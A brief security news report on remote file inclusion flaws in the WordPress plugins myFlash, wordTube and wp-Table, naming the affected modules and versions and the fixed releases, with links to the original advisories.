Plugins pose danger to WordPress blog security
Three plugins for popular blogging software WordPress pose a danger to system security. There are security vulnerabilities in myFlash, wordTube and wp-Table which allow an attacker to include his own PHP scripts and execute them with the web server's privileges. All three plugins were written by the same developer.
The bug is due to incorrect processing of the wppath parameter in the wordtube-button.php, js/wptable-button.php and myflash-button.php modules used by the plugins. wordTube versions 1.4.3 and earlier, wp-Table versions 1.4.3 and earlier and myFlash versions 1.10 and earlier are affected. The bugs are fixed in wordTube 1.4.4, wp-Table 1.4.4 and myFlash 1.11. Users should update or uninstall the plugins as soon as possible.
- wordpress plugins wp-Table <= 1.43 (inc_dir) Remote File Inclusion Vulnerability, advisory from M.Hasran Addahroni
- wordpress plugins wordTube <= 1.43 (wpPATH) Remote File Inclusion Vulnerability, advisory from M.Hasran Addahroni